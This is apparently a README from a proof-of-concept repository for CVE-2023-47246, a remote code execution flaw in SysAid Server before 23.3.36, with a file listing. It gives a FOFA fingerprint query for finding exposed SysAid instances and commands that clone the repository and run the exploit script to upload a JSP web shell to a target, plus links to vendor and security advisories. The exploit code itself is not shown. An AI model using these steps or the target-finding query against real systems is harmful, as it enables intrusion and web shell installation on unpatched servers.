exploit for cve-2023-47246 SysAid RCE (shell upload)# Vulnerability Details
1. fofa:
```text
body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
```
2. Affected versions: SysAid Server<23.3.36
# Vulnerability Recurrence
1. Execute the script:
```shell
git clone https://github.com/W01fh4cker/CVE-2023-47246-EXP.git
cd CVE-2023-47246-EXP
pip install -r requirements.txt
python CVE-2023-47246-EXP.py -u http://192.168.161.190:8443 -p http://127.0.0.1:8083 -f shell.jsp
```
2. result:
# Reference
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability
[4.0K] /data/pocs/a108e1369e3bf04f07e696ce656652bc2570af73
├── [ 12K] CVE-2023-47246-EXP.py
├── [ 4] CVE-2023-47246.txt
├── [1.0K] README.md
└── [ 16] requirements.txt
0 directories, 4 files